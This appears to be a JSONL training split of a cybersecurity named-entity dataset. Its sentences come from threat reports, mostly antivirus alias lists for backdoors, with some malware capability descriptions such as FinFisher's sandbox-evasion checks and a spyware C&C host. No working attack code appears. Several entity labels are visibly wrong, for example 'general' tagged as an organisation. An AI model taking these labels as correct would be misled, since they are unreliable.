{"text": "A backdoor also known as: Trojan.Win32.Swisyn!O VirTool.VBInject.DZ Trojan.Swisyn.Win32.11562 Troj.W32.Swisyn.lsGr Win32.Worm.IRCBot.ad W32/MalwareS.BHPN Win32/Swisyn.DJ TROJ_SWISYN.SMK Trojan.Win32.Swisyn.ahwe Trojan.Win32.Swisyn.btyha Trojan.Win32.A.Swisyn.327680 Trojan.VbCrypt.68 TROJ_SWISYN.SMK BehavesLike.Win32.VBObfus.fm Trojan.Win32.Swisyn Trojan/Swisyn.lxc Trojan.Symmi.D2474 Trojan.Win32.Swisyn.ahwe Trojan/Win32.Swisyn.R2925 Trojan.VBRA.03646 W32/Swisyn.F.worm Win32/AutoRun.IRCBot.FL Virus.Win32.Virut.ue Win32/RootKit.Rootkit.7e5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002433", "source": "cyner2_train"}}
{"text": "The malware has functionality to steal user credentials, provide shell access, and persist through firmware upgrades.", "spans": {"MALWARE: The malware": [[0, 11]]}, "info": {"id": "cyner2_train_002436", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Zum.Razy.1 Win32.Trojan.WisdomEyes.16070401.9500.9999 Zum.Razy.1 Zum.Razy.1 BehavesLike.Win32.Trojan.dh Zum.Razy.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002437", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.NSIS.NeksMiner.A WORM_CO.331300D2 Win32.Trojan.WisdomEyes.16070401.9500.9766 W32/Adware.DEZV-3749 Trojan.Coinbitminer WORM_CO.331300D2 Win.Trojan.Virtob-1633 Worm.NSIS.BitMin.d Trojan.Win32.BitCoinMiner.ddjqfi Trojan.BtcMine.1665 BehavesLike.Win32.TrojanCoinMiner.vc Trojan-PSW.Win32.Tepfer W32/Adware.ALRW RiskTool.BitCoinMiner.bf Trojan[PSW]/Win32.Tepfer Worm:Win32/NeksMiner.A Trojan.Strictor.D1B5F4 Worm.NSIS.BitMin.d Trojan/Win32.BitCoinMiner.C931392 TScope.Malware-Cryptor.SB RiskWare.BitCoinMiner NSIS/CoinMiner.T Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002443", "source": "cyner2_train"}}
{"text": "Recently observed initial threat activities targeting the telecommunication sector.", "spans": {"MALWARE: threat activities": [[26, 43]], "ORGANIZATION: the telecommunication sector.": [[54, 83]]}, "info": {"id": "cyner2_train_002446", "source": "cyner2_train"}}
{"text": "We decided to check the original plugin package and, to our surprise, found the file in the source! We also discovered that we were not the only ones that found this file although people on the forum seemed to believe that the file was just vulnerable .", "spans": {}, "info": {"id": "cyner2_train_002447", "source": "cyner2_train"}}
{"text": "This way, the HTA effectively serves as a wrapper to try and slip passed traditional file type-based scanning in the network as well as anti-spam services.", "spans": {"MALWARE: HTA": [[14, 17]], "SYSTEM: network": [[117, 124]], "SYSTEM: as anti-spam services.": [[133, 155]]}, "info": {"id": "cyner2_train_002450", "source": "cyner2_train"}}
{"text": "ESET researchers discovered a campaign that we attribute with high confidence to the APT group Tick.", "spans": {"ORGANIZATION: ESET researchers": [[0, 16]], "THREAT_ACTOR: campaign": [[30, 38]], "THREAT_ACTOR: the APT group Tick.": [[81, 100]]}, "info": {"id": "cyner2_train_002452", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Small.eivvce Trojan.Inject2.21676 BehavesLike.Win64.BadFile.wc PUA.Zzinfor TrojanDropper.Dinwod.aml Dropper/Win32.Dinwod.C1833968 Trojan.Mikey.D1229E Rootkit.Small!LMZdSa8k9cE Win32/Trojan.45a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002453", "source": "cyner2_train"}}
{"text": "The injected DLL then downloads the fileless Gootkit and saves it in the registry as binary data, then loading it in memory only.", "spans": {"MALWARE: fileless Gootkit": [[36, 52]]}, "info": {"id": "cyner2_train_002454", "source": "cyner2_train"}}
{"text": "This article mainly analyzes the controlling end, the generator and Windows and Linux variants in controlled end of this tool and makes a display of the homologous analysis and network infection of these samples.", "spans": {"SYSTEM: Windows": [[68, 75]], "SYSTEM: Linux": [[80, 85]], "MALWARE: tool": [[121, 125]]}, "info": {"id": "cyner2_train_002456", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Zlob Adware.NetAdware.BD", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002459", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FakeSvchostXKRB.Trojan Trojan-Downloader.Win32.Geral!O Downloader.Dogrobot.20415 Win32/SillyDl.QAC Trojan-Dropper.Win32.Injector.paib Trojan.Win32.Vilsel.iini Troj.Downloader.W32.Geral.kYTA Trojan.Win32.Downloader.wzh BackDoor.Guan.14 Downloader.Geral.Win32.1376 BehavesLike.Win32.StartPage.lm W32.Malware.Downloader Trojan[Dropper]/Win32.Injector Trojan.Win32.Downloader.16384.BHH Trojan-Dropper.Win32.Injector.paib TrojanDownloader:Win32/Dogrobot.D Trojan.Win32.Qhost", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002463", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Dialer!O Trojan.Zenshirsh.SL7 Trojan.Dialer Win32.Trojan.WisdomEyes.16070401.9500.9746 Win32/Startpage.RT TROJ_CJ.A Win.Trojan.Dialer-61 Trojan.Win32.Dialer.cj Trojan.Win32.MLW.wvye Troj.W32.Diamin.l3NB TrojWare.Win32.Dialer.A Dialer.Virgilio TROJ_CJ.A Trojan/Dialer.cio Trojan/Win32.Dialer Trojan.Win32.Dialer.cj Trojan/Win32.Dialer.R2306 MalwareScope.Dialer.Small.1 Dialer.LBU Win32.Trojan.Dialer.Pgxd Trojan.Win32.Dialer.cj", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002465", "source": "cyner2_train"}}
{"text": "Thanks to Bulwarkz for additional Forensic Analysis: - Clears the windows event log - Clears the journal log - Drops executables to the windows directory and starts them - Shows the ability to spread by using its contained functionality to enumerate network shares of other attached devices - Uses shutdown.exe to shutdown or reboot the system - Contains functionality to register a low level keyboard hook - Contains functionality to infect the boot sector.", "spans": {"ORGANIZATION: Bulwarkz": [[10, 18]]}, "info": {"id": "cyner2_train_002466", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9894 Trojan.Win32.CsDown.bdcfvq Trojan.CsDown.25 TrojanDropper:Win32/Waltrodock.B Trojan.Graftor.D4ACD Trojan.CsNowDown!qDe+BhsdQ1Y W32/WDockDrp.A!tr Trj/CI.A Win32/Trojan.8ea", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002467", "source": "cyner2_train"}}
{"text": "The decoy documents and filenames used in the attacks suggest the intended targets include organisations with political interests or influence in Israel and Palestine.", "spans": {}, "info": {"id": "cyner2_train_002468", "source": "cyner2_train"}}
{"text": "A lot of additional anti-sandbox checks are performed in this exact order : Check that the malware is not executed under the root folder of a drive Check that the malware file is readable from an external source Check that the hash of base path is not 3D6D62AF1A7C8053DBC8E110A530C679 Check that the full malware path contains only human readable characters ( “ a-z ” , “ A-Z ” , and “ 0-9 ” ) Check that no node in the full path contains the MD5 string of the malware file Fingerprint the system and check the following registry values : HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid should not be “ 6ba1d002-21ed-4dbe-afb5-08cf8b81ca32 ” HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\DigitalProductId should not be “ 55274-649-6478953-23109 ” , “ A22-00001 ” , or “ 47220 ” HARDWARE\\Description\\System\\SystemBiosDate should not contain “ 01/02/03 ” Check that the mutex WininetStartupMutex0 does not already exist Check that no DLL whose base name has hash value of 0xC9CEF3E4 is mapped into the malware address space The hashes in these checks are most likely correspond to sandbox or security products that the FinFisher authors want to avoid .", "spans": {"MALWARE: FinFisher": [[1122, 1131]]}, "info": {"id": "cyner2_train_002469", "source": "cyner2_train"}}
{"text": "Halloween is still a month from now and yet Android users are already being haunted by the previously reported Ghost Push malware, which roots devices and makes them download unwanted ads and apps.", "spans": {"SYSTEM: Android users": [[44, 57]], "MALWARE: Ghost Push malware,": [[111, 130]], "SYSTEM: roots devices": [[137, 150]]}, "info": {"id": "cyner2_train_002470", "source": "cyner2_train"}}
{"text": "Last March, we reported on Operation C-Major, an active information theft campaign that was able to steal sensitive information from high profile targets in India.", "spans": {"THREAT_ACTOR: Operation C-Major,": [[27, 45]], "THREAT_ACTOR: theft campaign": [[68, 82]], "ORGANIZATION: high profile targets": [[133, 153]]}, "info": {"id": "cyner2_train_002471", "source": "cyner2_train"}}
{"text": "Custom Content Type Manager CCTM is a relatively popular plugin with three years of development, 10,000+ active installs, and a satisfaction rating of 4.8. It helps create custom post types.", "spans": {"ORGANIZATION: Custom Content Type Manager CCTM": [[0, 32]], "SYSTEM: plugin": [[57, 63]]}, "info": {"id": "cyner2_train_002472", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Heur.AutoIT.13 Win32/Fynloski.STBTHUD Trojan.Win32.DarkKomet.dokuem Trojan.DownLoader12.11337 Trojan.Script.abcv Trojan:Win32/Manger.A Trojan.Autoit.Wirus Win32/TrojanDropper.Autoit.IC Win32/Trojan.Script.ed4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002474", "source": "cyner2_train"}}
{"text": "Moreover, the Sednit group has a special interest in Eastern Europe, where it regularly targets individuals and organizations involved in geopolitics", "spans": {"THREAT_ACTOR: Sednit group": [[14, 26]], "ORGANIZATION: individuals": [[96, 107]], "ORGANIZATION: organizations": [[112, 125]]}, "info": {"id": "cyner2_train_002475", "source": "cyner2_train"}}
{"text": "This virus ransomware arrives via email in a malicious attachment or by usurping an Adobe Flash Player installation.", "spans": {"MALWARE: virus ransomware": [[5, 21]]}, "info": {"id": "cyner2_train_002476", "source": "cyner2_train"}}
{"text": "Within a few minutes of installing one of these Trojans, all other active malware on the network is enabled on the victim's device.", "spans": {"MALWARE: Trojans,": [[48, 56]], "MALWARE: malware": [[74, 81]], "SYSTEM: victim's device.": [[115, 131]]}, "info": {"id": "cyner2_train_002477", "source": "cyner2_train"}}
{"text": "This particular application/game from Google Play Store is certainly not a system application, as the name seems intended to suggest.", "spans": {"SYSTEM: application/game": [[16, 32]], "SYSTEM: Google Play Store": [[38, 55]], "SYSTEM: system application,": [[75, 94]]}, "info": {"id": "cyner2_train_002478", "source": "cyner2_train"}}
{"text": "The bank then shared indicators of compromise IOCs with other institutions and a number of other institutions confirmed that they too had been compromised.", "spans": {"ORGANIZATION: The bank": [[0, 8]], "ORGANIZATION: institutions": [[62, 74], [97, 109]]}, "info": {"id": "cyner2_train_002479", "source": "cyner2_train"}}
{"text": "A few of these organizations have specifically been targeted by OceanLotus since early 2015.", "spans": {"ORGANIZATION: organizations": [[15, 28]], "ORGANIZATION: OceanLotus": [[64, 74]]}, "info": {"id": "cyner2_train_002481", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.MurLoDll1.Trojan Trojan-Downloader.Win32.Murlo!O Downloader.Murlo.Win32.5244 Trojan/Downloader.Murlo.nn TROJ_MURLO.BA Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Downloader.EKMU-1740 Win32/TrojanDownloader.Murlo.NN TROJ_MURLO.BA Win.Trojan.Murlo-7 Trojan-Downloader.Win32.Murlo.nn Trojan.Win32.Murlo.cpwkr Trojan.Win32.Downloader.5632.AY Trojan.DownLoader.62110 Trojan-Downloader.Win32.Murlo W32/Downldr2.CIAF TrojanDownloader.Murlo.hb Trojan[Downloader]/Win32.Murlo TrojanDownloader:Win32/Almanahe.A Trojan-Downloader.Win32.Murlo.nn Win32/SillyDl.EPI TrojanDownloader.Murlo W32/Murlo.NN!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002482", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Wabbin Win32.Trojan.WisdomEyes.16070401.9500.9773 W32.Wabbin Win.Worm.Wabbin-1 Email-Worm.Win32.Wabbin Trojan.Win32.Wabbin.eoih Email.Worm.W32!c IM-Worm.Win32.VB W32/Trojan.TLKW-6882 Worm[Email]/Win32.Wabbin Trojan.Heur.VP.E513A3 Email-Worm.Win32.Wabbin Worm:Win32/Wabbin.A@mm Worm.Wabbin Trj/CI.A Win32.Worm-email.Wabbin.Dxnb Worm.Wabbin! W32/Wabbin.A@mm Win32/Trojan.97a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002485", "source": "cyner2_train"}}
{"text": "A backdoor also known as: I-Worm.Music.C W32/Music.40960.B Music.H WORM_MUSIC.B Email-Worm.Win32.Music.B Worm.Win32.Email-Worm.Music.B BACKDOOR.Trojan WORM_MUSIC.B W32/Music.40960.B I-Worm/Music.b WORM/Music.B Worm:Win32/Music.C@mm I-Worm.Win32.Music.B[h] W32/Music.B Win32/Music.B Email-Worm.Win32.Music.A W32/Music.B@mm Worm.Win32.Music.Abh", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002486", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Hijack.356352.M VirTool.DelfInject Trojan.DelfInject Dropper.Injector.Win32.25443 Trojan/Dropper.Injector.dyha Win32.Trojan.Delf.k TROJ_NEOJIT.SMAR Trojan.Win32.Buzus.rfedr Trojan.DownLoader6.1239 TROJ_NEOJIT.SMAR BehavesLike.Win32.Worm.fh TrojanDropper.Injector.taw Trojan/Win32.Buzus TrojanDownloader:Win32/Neojit.A Trojan/Win32.Injector.R23295 BScope.Trojan-Dropper.Injector Win32/Delf.OEN Trojan-Downloader.Win32.Neojit Win32/Trojan.dee", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002487", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.MTX.B@mm W95.MTX Win32.MTX.B@mm W32/MTX@M.dll WORM_MTX.D W32/MTX.9244.B WORM_MTX.D Win.Trojan.MTX-5 Win32.MTX.B@mm Email-Worm.Win32.MTX.D Win32.MTX.B@mm Virus.Win32.MTX.hfxi Win32.MTX Win32.MTX.B@mm Win32.MTX.B@mm Win95.Matrix.9307 W95/MTX.dll@M W32/MTX.9244.B I-Worm/MTX.d W95/Mtx.B Win32.MTX.E2C45E Email-Worm.Win32.MTX.D Worm:Win32/MTX.B.dll W95/MTX.dll@M W32/MTX.D!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002488", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Small.9728.KQ Win32.Trojan.WisdomEyes.16070401.9500.9990 Backdoor.Teambot Win.Trojan.Zapchast-130 Trojan.Win32.TeamBot.ctspsr BackDoor.TeamBot.60 Trojan/Zapchast.exm W32/Sheldor.NAB!tr Win32.Troj.Undef.kcloud Trojan.Graftor.Elzob.950 Troj.W32.Zapchast.lhAn Trojan:Win32/Availmetre.B Trojan/Win32.Zapchast.R17936 SScope.Backdoor.Mudak Trojan.Win32.Availmetre", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002490", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32!O Backdoor.Small.MUE.A11 RiskWare.SpySoft Trojan.Udr.Win32.1 W32/BackdoorX.GMX Backdoor.Trojan Win32/BackMan.A BKDR_NEWHEUR.IZ Win.Trojan.Udr-1 Backdoor.Win32.Udr.a Trojan.Win32.Udr.csnpza Backdoor.Win32.Udr.aa BackDoor.Udr.1 BKDR_NEWHEUR.IZ BehavesLike.Win32.Backdoor.fc W32/Backdoor.COLY-8496 Backdoor/Udr.d BDS/Udr.A Trojan[Backdoor]/Win32.Udr Win32.Hack.Udr.B5.kcloud Backdoor.Win32.Udr.692018 Backdoor.Win32.Udr.a Trojan/Win32.Udr.R577 OScope.Backdoor.Udr Backdoor.JYfi Backdoor.Udr!EwW5NHJTxmo Backdoor.Win32.Udr W32/Udr.A!tr.bdr Dialer.CKP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002492", "source": "cyner2_train"}}
{"text": "It also has a general purpose-proxy and a module for sending spam messages.", "spans": {"ORGANIZATION: general": [[14, 21]]}, "info": {"id": "cyner2_train_002493", "source": "cyner2_train"}}
{"text": "The attackers attempted to steal $951m, of which $81m is still unaccounted for.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]]}, "info": {"id": "cyner2_train_002494", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9828 Win32.Trojan.Kriskynote.Ozic Trojan.Win32.Kriskynote Backdoor:Win32/Kriskynote.A BScope.Trojan.SvcHorse.01643 W32/Dropper.TMP!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002495", "source": "cyner2_train"}}
{"text": "Before that patch was released, the groups launched phishing campaigns against multiple companies in the aerospace and defense, construction and engineering, education, energy, health and biotechnology, high tech, non-profit, telecommunications, and transportation industries.", "spans": {"THREAT_ACTOR: phishing campaigns": [[52, 70]], "ORGANIZATION: multiple companies": [[79, 97]], "ORGANIZATION: aerospace": [[105, 114]], "ORGANIZATION: defense,": [[119, 127]], "ORGANIZATION: engineering, education, energy, health": [[145, 183]], "ORGANIZATION: biotechnology, high tech, non-profit, telecommunications,": [[188, 245]], "ORGANIZATION: transportation industries.": [[250, 276]]}, "info": {"id": "cyner2_train_002497", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Ollexos Win32.Trojan.Heur.Lhdl Trojan.Heur.Win32.9371 BehavesLike.Win32.Spyware.jc TR/RedCap.xrytt Trojan.Heur.OmNfrrOwGgmOh Trojan.Win32.Z.Redcap.655360 Trojan:Win32/Ollexos.A Win32/Trojan.7b0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002499", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGamesHEXW32AH.Trojan Trojan.Win32.Scar!O BackDoor.Boomie.A3 Trojan.Scar.Win32.63773 Trojan/Scar.fvka Win32.Trojan.Scar.d Win.Trojan.Scar-895 Trojan.Win32.Scar.fvka Trojan.Win32.Scar.bbmdmf Troj.W32.Scar.fvka!c Trojan.Win32.Scar.ft Trojan.DownLoad2.52794 Backdoor.Win32.Boomie Trojan/Scar.azbo Trojan/Win32.Scar Backdoor:Win32/Boomie.A Trojan.Win32.Scar.fvka Win-Trojan/Boomie.40960 Trojan.Scar!AGwL0r/7hW4 Win32/Trojan.Spy.81b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002500", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Shamoon.A Trojan/W32.Shamoon.192000 Trojan.Depriz Trojan/DistTrack.d Trojan.Shamoon.A Win32.Trojan.WisdomEyes.16070401.9500.9987 W32.Disttrack.B TROJ64_DISTTRACK.D Win.Malware.DistTrack-5743117-1 Trojan.Shamoon.A Trojan.Shamoon.A Trojan.Win64.DistTrack.elcfal Trojan.Win32.Z.Disttrack.192000 Trojan.Shamoon.A Trojan.Shamoon.A Trojan.DistTrack.Win32.9 TROJ64_DISTTRACK.D W64/Trojan.BOAO-0112 Trojan:Win64/Depriz.E!dha Trojan.DistTrack.A Trj/CI.A W64/DistTrack.D!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002501", "source": "cyner2_train"}}
{"text": "FastPOS was true to its moniker—pilfer data as fast as possible, as much as it can, even at the expense of stealth.", "spans": {"MALWARE: FastPOS": [[0, 7]]}, "info": {"id": "cyner2_train_002502", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.Banload!O Trojan/Downloader.Banload.qku Trojan.Graftor.D3222 Win32.Trojan.WisdomEyes.16070401.9500.9991 Trojan.DownLoad2.52025 Downloader.Banload.Win32.37297 Trojan.Win32.Spy TrojanDownloader:Win32/Spycos.B TrojanDownloader.Banload", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002503", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.KVM.B Backdoor/W32.KWM.70656 PWS-Susanin.dr Backdoor.KVM.B Trojan.KWM.B2 Infostealer.KMW.B KWM.B Win32/PSW.KWM.B BKDR_KWM.B Backdoor.Win32.KWM.b Trojan.Win32.KWM.baukx PE:Trojan.KWM.b!1073777723 Backdoor.KVM.B TrojWare.Win32.PSW.Susanin.B Backdoor.KVM.B BackDoor.KWM Backdoor.KWM.Win32.11 BKDR_KWM.B PWS-Susanin.dr W32/Risk.SBUI-3175 Backdoor/KWM.b TR/WebMoney.2 Trojan[Backdoor]/Win32.KWM Win32.Hack.KWM.b.kcloud PWS:Win32/Susanin.B Backdoor.Win32.KWM.70656[h] Win-Trojan/KWM.70656 Backdoor.KVM.B Backdoor.KVM.B Dropper.PSW.Liz.17 Trj/PSW.Susanin Win32/PSW.Susanin.B Backdoor.Win32.Kwm.B W32/Contract.B!tr.bdr PSW.Susanin Backdoor.Win32.KWM.aWbC", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002505", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Raxlogon.Trojan Worm.Win32.AutoRun!O Worm.Autorun.ZI8 Worm.AutoRun.Win32.22949 Win32.Worm.FakeFolder.b Win32/QQPass.NNE Worm.AutoRun Worm.Win32.AutoRun.hit Trojan.Win32.AutoRun.uaado Worm.Win32.Autorun.81108 Worm.Win32.Pronny.BL Trojan.PWS.Qqpass.5627 BackDoor-CCT.dll Worm/AutoRun.wxz Trojan:Win32/Hideproc.E Trojan[Monitor]/Win32.ActualSpy Win32.Troj.Undef.kcloud HEUR/Fakon.mwf Trojan.AVKill W32/Autorun.KBC Trojan.Win32.FakeFolder.pb Worm.AutoRun!PDL9JmhYC4g Backdoor.Win32.DarkMoon", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002506", "source": "cyner2_train"}}
{"text": "New campaign involving PoSeidon/FindPOS point of sale malware", "spans": {"MALWARE: campaign": [[4, 12]], "MALWARE: point of sale malware": [[40, 61]]}, "info": {"id": "cyner2_train_002507", "source": "cyner2_train"}}
{"text": "This morning Mozilla released security updates that fix the vulnerability.", "spans": {"ORGANIZATION: Mozilla": [[13, 20]], "VULNERABILITY: vulnerability.": [[60, 74]]}, "info": {"id": "cyner2_train_002508", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Notepices Win32.Trojan.WisdomEyes.16070401.9500.9871 not-a-virus:AdWare.Win32.ICLoader.alpu Riskware.Win32.Hpdefender.ekfhpl Trojan.StartPage1.28867 Trojan.Win32.Notepices Pua.Downloader GrayWare[AdWare]/Win32.Hpdefender not-a-virus:AdWare.Win32.ICLoader.alpu Adware.HPDefender Win32/Adware.HPDefender.JG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002509", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.RsLpTTc.Worm Ransom.Lyposit.S3755 W32.Sality.lak4 Trojan/Lyposit.a Trojan.Zusy.D382F1 Ransom_Lyposit.R002C0CAT18 Win32.Trojan.WisdomEyes.16070401.9500.9902 Ransom_Lyposit.R002C0CAT18 Win.Trojan.Updays-1 Trojan.Win32.Clicker.efvwpu TrojWare.Win32.Lyposit.C Trojan.Click2.50933 Trojan.Lyposit.Win32.25 Trojan-Ransom.Lyposit Ransom:Win32/Lyposit.B Trojan/Win32.Lyposit.R188188 W32/Lyposit.A70!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002511", "source": "cyner2_train"}}
{"text": "The malware used in email campaigns is often ransomware or banking malware.", "spans": {"MALWARE: malware": [[4, 11]], "THREAT_ACTOR: email campaigns": [[20, 35]], "MALWARE: ransomware": [[45, 55]], "MALWARE: banking malware.": [[59, 75]]}, "info": {"id": "cyner2_train_002512", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Injector.AutoIt Trojan.StartPage1.24074 TrojanClicker:Win32/Rubalotalow.A Win32/Trojan.ab1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002514", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Virus02 Virus.Win32.Sality!O Win32.Trojan.WisdomEyes.16070401.9500.9989 Win.Trojan.Zusy-6041926-0 Trojan.Win32.Scar.okvf Win32.Trojan.Scar.Wwek Trojan.DownLoader24.19336 Trojan.Scar.kws Trojan/Win32.Cosmu PWS:Win32/Sapbexts.B Trojan.Win32.Scar.okvf Trojan/Win32.Cosmu.R214802 Trojan.Vilsel Trojan.Cosmu!F9mC6Li+PNw Win32/Trojan.Scar.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002515", "source": "cyner2_train"}}
{"text": "You may mistakenly download and run TrojanDropper:Win32/Gepys.A, thinking it is an update for Java.", "spans": {}, "info": {"id": "cyner2_train_002516", "source": "cyner2_train"}}
{"text": "If the attack succeeds, the malware changes the addresses of the DNS servers in the router's settings, thereby rerouting all DNS queries from devices in the attacked Wi-Fi network to the servers of the cybercriminals such an attack is also known as DNS-hijacking.", "spans": {"MALWARE: malware": [[28, 35]], "SYSTEM: DNS servers": [[65, 76]], "SYSTEM: router's settings,": [[84, 102]], "SYSTEM: DNS queries": [[125, 136]], "SYSTEM: devices": [[142, 149]], "SYSTEM: Wi-Fi network": [[166, 179]], "SYSTEM: servers": [[187, 194]], "THREAT_ACTOR: cybercriminals": [[202, 216]]}, "info": {"id": "cyner2_train_002518", "source": "cyner2_train"}}
{"text": "Interestingly, the attackers camouflage one of their delivery domains by redirecting visitors to El Universal, a major Mexican newspaper.", "spans": {"THREAT_ACTOR: attackers": [[19, 28]], "ORGANIZATION: El Universal, a major Mexican newspaper.": [[97, 137]]}, "info": {"id": "cyner2_train_002522", "source": "cyner2_train"}}
{"text": "These emails are mainly sent to Colombians who may work in the accounting or finance departments of various-sized organizations.", "spans": {}, "info": {"id": "cyner2_train_002523", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader Trojan/Downloader.Boaxxe.aa Win32.TRDldr.JeRips TR/Dldr.JeRips.A W32/Boaxxe.AB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002525", "source": "cyner2_train"}}
{"text": "Service Name Purpose AndroidAlarmManager Uploading last recorded .amr audio AndroidSystemService Audio recording AndroidSystemQueues Location tracking with movement detection ClearSystems GSM tracking ( CID , LAC , PSC ) ClipService Clipboard stealing AndroidFileManager Uploading all exfiltrated data AndroidPush XMPP С & C protocol ( url.plus:5223 ) RegistrationService Registration on C & C via HTTP ( url.plus/app/pro/ ) Interestingly , a self-protection feature was implemented in almost every service .", "spans": {"SYSTEM: GSM": [[188, 191]]}, "info": {"id": "cyner2_train_002526", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.MulDrop5.40693 TR/Downloader.A.7912 Trojan[Ransom]/Win32.Blocker Trojan:MSIL/Dubfot.A Trojan.FakeMS Trojan.MSIL.IRCBot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002527", "source": "cyner2_train"}}
{"text": "New ransomware using the .ipygh extension.", "spans": {"MALWARE: ransomware": [[4, 14]]}, "info": {"id": "cyner2_train_002530", "source": "cyner2_train"}}
{"text": "How do you know if your Google account is breached ? You can check if your account is compromised by accessing the following web site that we created : https : //gooligan.checkpoint.com/ .", "spans": {"ORGANIZATION: Google": [[24, 30]]}, "info": {"id": "cyner2_train_002531", "source": "cyner2_train"}}
{"text": "The most recently discovered Microsoft SQL server being used as Escalar infrastructure contained records of 1660 infections that all connected in a two-day time frame.", "spans": {"SYSTEM: Microsoft SQL server": [[29, 49]], "MALWARE: Escalar": [[64, 71]], "SYSTEM: infrastructure": [[72, 86]]}, "info": {"id": "cyner2_train_002533", "source": "cyner2_train"}}
{"text": "Later on, we found evidence of the same attack perpetrated on May 3.", "spans": {}, "info": {"id": "cyner2_train_002534", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Worm.Lemoor.A Worm/W32.Lemoor.1981 Trojan-Downloader.Win32.Small!O Win32.Worm.Lemoor.A Worm.Lemoor.Win32.2 W32.W.Lemoor.a!c W32/Lemoor.a Win32.Worm.Lemoor.A WORM_LEMOOR.D Win32.Trojan.WisdomEyes.16070401.9500.9995 W32/Lemoor.A W32.Lemoor.A WORM_LEMOOR.D Win.Worm.Lemoor-3 Win32.Worm.Lemoor.A Worm.Win32.Lemoor.a Win32.Worm.Lemoor.A Win32.Worm.Lemoor.A Worm.Win32.Lemoor.B Win32.Worm.Lemoor.A Win32.Ephem.24 W32/Lemoor.JDMS-3575 I-Worm/Lemoor.a WORM/Lemoor.A Worm/Win32.Lemoor Worm.Win32.Lemoor.a Worm/Win32.Lemoor.R37765 Worm.Lemoor W32/Lemoor.B.worm Win32/Lemoor.B Win32.Worm.Lemoor.Ahos Worm.Lemoor!V5CZ/YV1RTs Worm.Win32.Lemoor W32/Lemoor.A!worm Win32/Worm.857", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002535", "source": "cyner2_train"}}
{"text": "User-agent: Go-http-client/1.1", "spans": {}, "info": {"id": "cyner2_train_002536", "source": "cyner2_train"}}
